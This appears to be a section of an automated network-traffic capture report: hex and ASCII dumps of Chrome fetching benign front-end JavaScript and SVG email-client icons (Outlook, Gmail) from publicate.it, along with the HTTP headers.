                                                                                                                                                                                                        2024-08-30 16:16:21 UTC1369INData Raw: 65 74 54 69 6d 65 6f 75 74 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 61 6c 76 69 73 2d 6e 62 63 6c 2d 63 6f 6e 74 61 69 6e 65 72 2d 2d 6f 70 65 6e 69 6e 67 22 29 2c 6e 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 61 6c 76 69 73 2d 6e 62 63 6c 2d 63 6f 6e 74 61 69 6e 65 72 2d 2d 68 69 64 69 6e 67 22 29 2c 6e 2e 63 6c 61 73 73 4c 69 73 74 2e 63 6f 6e 74 61 69 6e 73 28 22 61 6c 76 69 73 2d 6e 62 63 6c 2d 63 6f 6e 74 61 69 6e 65 72 2d 2d 6f 70 65 6e 22 29 7c 7c 6e 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 61 6c 76 69 73 2d 6e 62 63 6c 2d 63 6f 6e 74 61 69 6e 65 72 2d 2d 6f 70 65 6e 22 29 7d 29 2c 33 30 30 29 7d 7d 76 61 72 20 78 3d 2f 5c 7b 5c 7b 5b 61 2d 7a 41 2d 5a 5c 2e 5c 5f 5c 2d
                                                                                                                                                                                                        Data Ascii: etTimeout((function(){n.classList.remove("alvis-nbcl-container--opening"),n.classList.remove("alvis-nbcl-container--hiding"),n.classList.contains("alvis-nbcl-container--open")||n.classList.add("alvis-nbcl-container--open")}),300)}}var x=/\{\{[a-zA-Z\.\_\-
                                                                                                                                                                                                        2024-08-30 16:16:21 UTC1369INData Raw: 20 74 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 66 6f 72 28 74 2e 69 6e 6e 65 72 48 54 4d 4c 3d 6e 3b 74 2e 63 68 69 6c 64 72 65 6e 2e 6c 65 6e 67 74 68 3e 30 3b 29 65 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 2e 63 68 69 6c 64 72 65 6e 5b 30 5d 29 7d 2c 61 2e 67 65 74 46 72 6f 6d 53 74 6f 72 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 6c 53 74 6f 72 61 67 65 29 72 65 74 75 72 6e 20 65 3d 65 2b 22 5f 22 2b 72 2e 61 6c 76 69 73 5f 69 64 2c 6c 6f 63 61 6c 53 74 6f 72 61 67 65 2e 67 65 74 49 74 65 6d 28 65 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 2c 61 2e 67 65 74 54 6f 70 44 6f 6d 61 69 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 66 6f 72 28 76
                                                                                                                                                                                                        Data Ascii: t=document.createElement("div");for(t.innerHTML=n;t.children.length>0;)e.appendChild(t.children[0])},a.getFromStorage=function(e){try{if(window.localStorage)return e=e+"_"+r.alvis_id,localStorage.getItem(e)}catch(e){}},a.getTopDomain=function(){try{for(v


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        69192.168.2.549839104.26.8.2344436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:16:21 UTC925OUTGET /images/outlook_client.svg HTTP/1.1
                                                                                                                                                                                                        Host: publicate.it
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                        Referer: https://publicate.it/?utm_source=publicate_user_exported_emails&utm_medium=referral&utm_campaign=powered_by_publicate
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _ga=GA1.2.1381680606.1725034579; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698
                                                                                                                                                                                                        2024-08-30 16:16:22 UTC751INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Fri, 30 Aug 2024 16:16:21 GMT
                                                                                                                                                                                                        Content-Type: image/svg+xml
                                                                                                                                                                                                        Content-Length: 12820
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        last-modified: Tue, 27 Aug 2024 13:21:04 GMT
                                                                                                                                                                                                        etag: "3214-620aa1d14adc0"
                                                                                                                                                                                                        permissions-policy: browsing-topics=()
                                                                                                                                                                                                        cache-control: private
                                                                                                                                                                                                        CF-Cache-Status: BYPASS
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BWuIOXzQO3bVinYMHrgK%2Ft01iqounsyjRuUR6PWeHChsbzEr77PU452r7h9lD%2B2EaUb6bxUlJj6Y4djA2eUdPMM3s3jplfYBvukHlZcLGbhskBZehVVtYGT1I6lv5g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                        Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                        CF-RAY: 8bb615b8cae44350-EWR
                                                                                                                                                                                                        2024-08-30 16:16:22 UTC618INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 73 76 67 20 77 69 64 74 68 3d 22 31 33 36 70 78 22 20 68 65 69 67 68 74 3d 22 31 33 36 70 78 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 33 36 20 31 33 36 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 64 65 66 73 3e 0a 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 64 3d 22 4d 38 2e 39 37 38 32 36 30 38 37 2c 30 20 4c 31 30 39
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="UTF-8"?><svg width="136px" height="136px" viewBox="0 0 136 136" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <title>1</title> <defs> <path d="M8.97826087,0 L109
                                                                                                                                                                                                        2024-08-30 16:16:22 UTC1369INData Raw: 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 65 4d 6f 72 70 68 6f 6c 6f 67 79 20 72 61 64 69 75 73 3d 22 30 2e 35 22 20 6f 70 65 72 61 74 6f 72 3d 22 64 69 6c 61 74 65 22 20 69 6e 3d 22 53 6f 75 72 63 65 41 6c 70 68 61 22 20 72 65 73 75 6c 74 3d 22 73 68 61 64 6f 77 53 70 72 65 61 64 4f 75 74 65 72 31 22 3e 3c 2f 66 65 4d 6f 72 70 68 6f 6c 6f 67 79 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 65 4f 66 66 73 65 74 20 64 78 3d 22 30 22 20 64 79 3d 22 34 22 20 69 6e 3d 22 73 68 61 64 6f 77 53 70 72 65 61 64 4f 75 74 65 72 31 22 20 72 65 73 75 6c 74 3d 22 73 68 61 64 6f 77 4f 66 66 73 65 74 4f 75 74 65 72 31 22 3e 3c 2f 66 65 4f 66 66 73 65 74 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 65 47 61 75 73 73 69 61 6e 42 6c 75 72 20 73 74 64 44 65 76
                                                                                                                                                                                                        Data Ascii: "> <feMorphology radius="0.5" operator="dilate" in="SourceAlpha" result="shadowSpreadOuter1"></feMorphology> <feOffset dx="0" dy="4" in="shadowSpreadOuter1" result="shadowOffsetOuter1"></feOffset> <feGaussianBlur stdDev
                                                                                                                                                                                                        2024-08-30 16:16:22 UTC1369INData Raw: 34 31 37 31 2e 30 30 30 30 30 30 29 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 20 69 64 3d 22 45 6d 61 69 6c 2d 63 6c 69 65 6e 74 73 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 34 31 38 2e 30 30 30 30 30 30 2c 20 34 30 38 34 2e 30 30 30 30 30 30 29 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 20 69 64 3d 22 31 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2e 30 30 30 30 30 30 2c 20 39 32 2e 30 30 30 30 30 30 29 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 20 69 64 3d 22 52 65 63 74 61 6e 67 6c 65 2d 31 32 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 75 73 65 20 66 69 6c 6c 3d 22 62 6c 61 63 6b 22 20 66 69 6c 6c
                                                                                                                                                                                                        Data Ascii: 4171.000000)"> <g id="Email-clients" transform="translate(418.000000, 4084.000000)"> <g id="1" transform="translate(0.000000, 92.000000)"> <g id="Rectangle-12"> <use fill="black" fill
                                                                                                                                                                                                        2024-08-30 16:16:22 UTC1369INData Raw: 35 32 39 35 38 35 20 34 32 2e 30 32 32 35 35 33 35 2c 34 37 2e 31 38 36 35 39 38 33 20 4c 36 34 2e 36 38 38 39 32 35 2c 33 33 2e 36 31 31 34 38 37 36 20 43 36 35 2e 31 34 31 37 32 32 32 2c 33 33 2e 33 34 34 33 38 34 31 20 36 35 2e 34 31 38 31 35 31 39 2c 33 32 2e 38 35 32 30 33 31 38 20 36 35 2e 34 31 33 30 34 33 35 2c 33 32 2e 33 32 31 36 39 32 32 20 5a 22 20 69 64 3d 22 50 61 74 68 22 20 66 69 6c 6c 3d 22 23 30 41 32 37 36 37 22 3e 3c 2f 70 61 74 68 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 64 3d 22 4d 31 38 2e 35 39 32 34 38 31 39 2c 32 33 2e 32 35 37 37 37 35 32 20 4c 33 33 2e 34 36 37 30 39 36 31 2c 32 33 2e 32 35 37 37 37 35 32 20 4c 33 33 2e 34 36 37 30 39 36 31 2c 33 37 2e 30 35 32 39 36 36 32
                                                                                                                                                                                                        Data Ascii: 529585 42.0225535,47.1865983 L64.688925,33.6114876 C65.1417222,33.3443841 65.4181519,32.8520318 65.4130435,32.3216922 Z" id="Path" fill="#0A2767"></path> <path d="M18.5924819,23.2577752 L33.4670961,23.2577752 L33.4670961,37.0529662
                                                                                                                                                                                                        2024-08-30 16:16:22 UTC1369INData Raw: 31 39 20 33 37 2e 30 35 32 39 36 36 32 20 33 33 2e 34 36 37 30 39 36 31 20 33 37 2e 30 35 32 39 36 36 32 20 33 33 2e 34 36 37 30 39 36 31 20 34 39 2e 35 39 33 37 38 32 38 20 31 38 2e 35 39 32 34 38 31 39 20 34 39 2e 35 39 33 37 38 32 38 22 3e 3c 2f 70 6f 6c 79 67 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 6f 6c 79 67 6f 6e 20 69 64 3d 22 50 61 74 68 22 20 66 69 6c 6c 3d 22 23 30 30 37 38 44 34 22 20 70 6f 69 6e 74 73 3d 22 34 38 2e 36 37 39 34 34 31 37 20 33 36 2e 39 33 39 30 37 36 38 20 36 32 2e 33 37 30 35 33 31 34 20 33 36 2e 39 33 39 30 37 36 38 20 36 32 2e 33 37 30 35 33 31 34 20 35 30 2e 37 39 31 32 33 30 35 20 34 38 2e 36 37 39 34 34 31 37 20 35 30 2e 37 39 31 32 33 30 35 22 3e 3c 2f 70 6f 6c 79 67 6f
                                                                                                                                                                                                        Data Ascii: 19 37.0529662 33.4670961 37.0529662 33.4670961 49.5937828 18.5924819 49.5937828"></polygon> <polygon id="Path" fill="#0078D4" points="48.6794417 36.9390768 62.3705314 36.9390768 62.3705314 50.7912305 48.6794417 50.7912305"></polygo
                                                                                                                                                                                                        2024-08-30 16:16:22 UTC1369INData Raw: 34 38 37 36 38 36 20 31 35 2e 39 35 30 38 39 36 34 2c 33 32 2e 37 34 31 38 36 35 31 20 31 35 2e 39 34 32 35 30 31 34 2c 33 32 2e 37 34 31 38 36 35 31 20 4c 31 35 2e 39 34 32 35 30 31 34 2c 33 32 2e 37 34 31 38 36 35 31 20 4c 31 33 2e 36 39 31 30 38 39 36 2c 33 31 2e 33 37 32 30 34 37 31 20 4c 31 33 2e 36 39 31 30 38 39 36 2c 33 30 2e 32 31 37 36 38 32 38 20 4c 31 34 2e 36 31 39 30 34 37 32 2c 33 30 2e 32 30 32 32 38 35 35 20 4c 31 36 2e 35 38 31 34 31 38 39 2c 33 31 2e 33 34 31 32 35 32 34 20 4c 31 36 2e 36 32 37 30 33 38 2c 33 31 2e 33 35 36 36 34 39 37 20 4c 31 36 2e 37 39 34 33 36 37 36 2c 33 31 2e 34 36 34 33 39 34 37 20 43 31 36 2e 37 39 34 33 36 37 36 2c 33 31 2e 34 36 34 33 39 34 37 20 33 39 2e 38 35 36 32 33 35 35 2c 34 34 2e 37 37 37 38 35 39 37
                                                                                                                                                                                                        Data Ascii: 487686 15.9508964,32.7418651 15.9425014,32.7418651 L15.9425014,32.7418651 L13.6910896,31.3720471 L13.6910896,30.2176828 L14.6190472,30.2022855 L16.5814189,31.3412524 L16.627038,31.3566497 L16.7943676,31.4643947 C16.7943676,31.4643947 39.8562355,44.7778597
                                                                                                                                                                                                        2024-08-30 16:16:22 UTC1369INData Raw: 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 64 3d 22 4d 34 32 2e 33 35 31 31 30 34 2c 34 36 2e 32 35 30 37 39 36 33 20 4c 34 32 2e 30 31 31 38 37 32 32 2c 34 36 2e 34 34 33 31 39 30 34 20 43 34 31 2e 39 31 33 35 36 30 37 2c 34 36 2e 35 30 36 35 31 34 35 20 34 31 2e 38 31 31 39 39 38 33 2c 34 36 2e 35 36 34 35 39 37 38 20 34 31 2e 37 30 37 36 31 33 38 2c 34 36 2e 36 31 37 31 31 34 39 20 43 34 31 2e 33 33 33 38 37 33 2c 34 36 2e 38 30 32 37 31 33 38 20 34 30 2e 39 32 37 34 38 30 37 2c 34 36 2e 39 31 31 35 34 33 32 20 34 30 2e 35 31 31 39 34 33 32 2c 34 36 2e 39 33 37 32 34 31 35 20 4c 34 39 2e 31 33 35 38 31 31 34 2c 35 37 2e 32 35 35 35 36 39 20 4c 36 34 2e 31 37 39 32 39 31 33 2c 36 30 2e 39 32 33 33 30 38 35 20 43 36 34 2e 35 39 31 35 30 36 36 2c 36
                                                                                                                                                                                                        Data Ascii: <path d="M42.351104,46.2507963 L42.0118722,46.4431904 C41.9135607,46.5065145 41.8119983,46.5645978 41.7076138,46.6171149 C41.333873,46.8027138 40.9274807,46.9115432 40.5119432,46.9372415 L49.1358114,57.255569 L64.1792913,60.9233085 C64.5915066,6
                                                                                                                                                                                                        2024-08-30 16:16:22 UTC1369INData Raw: 39 36 33 38 37 33 31 20 43 33 36 2e 35 30 36 38 35 37 34 2c 34 39 2e 31 31 34 39 31 32 31 20 33 35 2e 38 31 35 31 30 34 36 2c 35 30 2e 31 34 39 35 33 31 35 20 33 34 2e 37 36 30 31 34 39 34 2c 35 30 2e 35 38 30 34 30 33 31 20 43 33 34 2e 34 33 33 33 34 39 34 2c 35 30 2e 37 32 32 34 38 34 38 20 33 34 2e 30 38 31 34 2c 35 30 2e 37 39 35 38 39 33 31 20 33 33 2e 37 32 35 36 39 39 36 2c 35 30 2e 37 39 35 38 39 33 31 20 4c 31 35 2e 32 31 32 33 30 39 39 2c 35 30 2e 37 39 35 38 39 33 31 20 4c 31 35 2e 32 31 32 33 30 39 39 2c 31 33 2e 38 35 32 31 35 33 38 20 4c 31 38 2e 32 35 34 37 38 36 32 2c 31 33 2e 38 35 32 31 35 33 38 20 4c 31 38 2e 32 35 34 37 38 36 32 2c 31 32 2e 33 31 33 30 33 37 36 20 4c 33 33 2e 37 32 35 37 33 35 33 2c 31 32 2e 33 31 33 30 33 37 36 20 43
                                                                                                                                                                                                        Data Ascii: 9638731 C36.5068574,49.1149121 35.8151046,50.1495315 34.7601494,50.5804031 C34.4333494,50.7224848 34.0814,50.7958931 33.7256996,50.7958931 L15.2123099,50.7958931 L15.2123099,13.8521538 L18.2547862,13.8521538 L18.2547862,12.3130376 L33.7257353,12.3130376 C
                                                                                                                                                                                                        2024-08-30 16:16:22 UTC1369INData Raw: 34 39 2e 32 35 32 30 37 38 32 20 4c 31 35 2e 32 31 32 33 30 39 39 2c 34 39 2e 32 35 32 30 37 38 32 20 4c 31 35 2e 32 31 32 33 30 39 39 2c 31 33 2e 38 35 32 31 35 33 38 20 4c 33 30 2e 36 38 33 32 32 33 33 2c 31 33 2e 38 35 32 31 35 33 38 20 43 33 32 2e 32 32 31 35 35 35 33 2c 31 33 2e 38 35 32 39 38 35 31 20 33 33 2e 34 36 37 39 31 37 37 2c 31 35 2e 31 31 35 34 31 39 36 20 33 33 2e 34 36 37 30 39 36 31 2c 31 36 2e 36 37 31 38 34 38 37 20 43 33 33 2e 34 36 37 30 39 36 31 2c 31 36 2e 36 37 32 33 35 34 37 20 33 33 2e 34 36 37 30 39 36 31 2c 31 36 2e 36 37 32 38 36 30 37 20 33 33 2e 34 36 37 30 39 36 31 2c 31 36 2e 36 37 33 33 36 36 37 20 5a 22 20 69 64 3d 22 50 61 74 68 22 20 66 69 6c 6c 3d 22 23 30 30 30 30 30 30 22 20 6f 70 61 63 69 74 79 3d 22 30 2e 32 22
                                                                                                                                                                                                        Data Ascii: 49.2520782 L15.2123099,49.2520782 L15.2123099,13.8521538 L30.6832233,13.8521538 C32.2215553,13.8529851 33.4679177,15.1154196 33.4670961,16.6718487 C33.4670961,16.6723547 33.4670961,16.6728607 33.4670961,16.6733667 Z" id="Path" fill="#000000" opacity="0.2"
                                                                                                                                                                                                        2024-08-30 16:16:22 UTC1250INData Raw: 20 39 2e 34 33 33 36 31 36 32 34 2c 33 37 2e 32 34 33 34 34 34 36 20 38 2e 37 33 31 38 39 36 35 34 2c 33 35 2e 38 32 36 32 34 31 39 20 43 37 2e 39 38 30 36 39 39 35 39 2c 33 34 2e 32 39 31 33 31 38 34 20 37 2e 36 30 34 31 30 30 38 35 2c 33 32 2e 35 39 36 36 30 32 37 20 37 2e 36 33 33 35 37 32 38 36 2c 33 30 2e 38 38 34 31 30 34 33 20 43 37 2e 36 30 32 32 37 38 39 34 2c 32 39 2e 30 39 30 37 35 31 38 20 37 2e 39 37 32 30 31 38 37 34 2c 32 37 2e 33 31 33 34 34 37 33 20 38 2e 37 31 35 31 34 32 31 35 2c 32 35 2e 36 38 34 39 38 33 34 20 5a 20 4d 31 32 2e 31 31 30 35 33 32 34 2c 33 34 2e 30 34 32 34 33 31 35 20 43 31 32 2e 34 37 36 39 34 39 39 2c 33 34 2e 39 37 38 39 39 32 35 20 31 33 2e 30 39 38 33 32 37 31 2c 33 35 2e 37 39 31 32 35 34 36 20 31 33 2e 39 30 32
                                                                                                                                                                                                        Data Ascii: 9.43361624,37.2434446 8.73189654,35.8262419 C7.98069959,34.2913184 7.60410085,32.5966027 7.63357286,30.8841043 C7.60227894,29.0907518 7.97201874,27.3134473 8.71514215,25.6849834 Z M12.1105324,34.0424315 C12.4769499,34.9789925 13.0983271,35.7912546 13.902


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        70192.168.2.549840104.26.8.2344436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:16:21 UTC923OUTGET /images/gmail_client.svg HTTP/1.1
                                                                                                                                                                                                        Host: publicate.it
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                        Referer: https://publicate.it/?utm_source=publicate_user_exported_emails&utm_medium=referral&utm_campaign=powered_by_publicate
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _ga=GA1.2.1381680606.1725034579; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698
                                                                                                                                                                                                        2024-08-30 16:16:22 UTC753INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Fri, 30 Aug 2024 16:16:22 GMT
                                                                                                                                                                                                        Content-Type: image/svg+xml
                                                                                                                                                                                                        Content-Length: 3140
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        last-modified: Tue, 27 Aug 2024 13:21:04 GMT
                                                                                                                                                                                                        etag: "c44-620aa1d18c4a4"
                                                                                                                                                                                                        permissions-policy: browsing-topics=()
                                                                                                                                                                                                        cache-control: private
                                                                                                                                                                                                        CF-Cache-Status: BYPASS
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7TUkD3mwZ1TS92vEcgsQwTkD4eQJyI3CNQE1%2BVN%2FSRY0k5vUk1Tc8a8WGYDqP3M9nhdLpPygyPIi6k%2FWSqtDk2fzNd9B1BvOlomXanidOWk%2BZxERb%2FHfYgn9V3ROxA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                        Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                        CF-RAY: 8bb615b8ec7a8c7e-EWR
                                                                                                                                                                                                        2024-08-30 16:16:22 UTC616INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 73 76 67 20 77 69 64 74 68 3d 22 31 33 36 70 78 22 20 68 65 69 67 68 74 3d 22 31 33 36 70 78 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 33 36 20 31 33 36 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 32 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 64 65 66 73 3e 0a 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 64 3d 22 4d 39 2e 32 31 38 37 35 2c 30 20 4c 31 30 38 2e 37 38
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="UTF-8"?><svg width="136px" height="136px" viewBox="0 0 136 136" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <title>2</title> <defs> <path d="M9.21875,0 L108.78
                                                                                                                                                                                                        2024-08-30 16:16:22 UTC1369INData Raw: 65 4d 6f 72 70 68 6f 6c 6f 67 79 20 72 61 64 69 75 73 3d 22 30 2e 35 22 20 6f 70 65 72 61 74 6f 72 3d 22 64 69 6c 61 74 65 22 20 69 6e 3d 22 53 6f 75 72 63 65 41 6c 70 68 61 22 20 72 65 73 75 6c 74 3d 22 73 68 61 64 6f 77 53 70 72 65 61 64 4f 75 74 65 72 31 22 3e 3c 2f 66 65 4d 6f 72 70 68 6f 6c 6f 67 79 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 65 4f 66 66 73 65 74 20 64 78 3d 22 30 22 20 64 79 3d 22 34 22 20 69 6e 3d 22 73 68 61 64 6f 77 53 70 72 65 61 64 4f 75 74 65 72 31 22 20 72 65 73 75 6c 74 3d 22 73 68 61 64 6f 77 4f 66 66 73 65 74 4f 75 74 65 72 31 22 3e 3c 2f 66 65 4f 66 66 73 65 74 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 65 47 61 75 73 73 69 61 6e 42 6c 75 72 20 73 74 64 44 65 76 69 61 74 69 6f 6e 3d 22 34 22 20 69 6e 3d 22 73 68
                                                                                                                                                                                                        Data Ascii: eMorphology radius="0.5" operator="dilate" in="SourceAlpha" result="shadowSpreadOuter1"></feMorphology> <feOffset dx="0" dy="4" in="shadowSpreadOuter1" result="shadowOffsetOuter1"></feOffset> <feGaussianBlur stdDeviation="4" in="sh
                                                                                                                                                                                                        2024-08-30 16:16:22 UTC1155INData Raw: 20 20 20 20 20 20 20 3c 70 61 74 68 20 64 3d 22 4d 34 2e 34 35 33 34 36 39 36 37 2c 35 30 2e 37 30 33 31 32 35 20 4c 31 34 2e 38 34 34 38 39 38 39 2c 35 30 2e 37 30 33 31 32 35 20 4c 31 34 2e 38 34 34 38 39 38 39 2c 32 34 2e 34 38 39 32 36 34 35 20 4c 30 2c 31 32 2e 39 32 34 33 32 36 20 4c 30 2c 34 36 2e 30 37 37 31 34 39 36 20 43 30 2c 34 38 2e 36 33 36 38 35 36 20 31 2e 39 39 36 36 33 38 39 2c 35 30 2e 37 30 33 31 32 35 20 34 2e 34 35 33 34 36 39 36 37 2c 35 30 2e 37 30 33 31 32 35 22 20 69 64 3d 22 50 61 74 68 22 20 66 69 6c 6c 3d 22 23 34 32 38 35 46 34 22 3e 3c 2f 70 61 74 68 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 64 3d 22 4d 35 32 2e 34 35 31 39 37 36 31 2c 35 30 2e 37 30 33 31 32 35 20 4c 36
                                                                                                                                                                                                        Data Ascii: <path d="M4.45346967,50.703125 L14.8448989,50.703125 L14.8448989,24.4892645 L0,12.924326 L0,46.0771496 C0,48.636856 1.9966389,50.703125 4.45346967,50.703125" id="Path" fill="#4285F4"></path> <path d="M52.4519761,50.703125 L6


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        71192.168.2.54983218.239.83.814436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
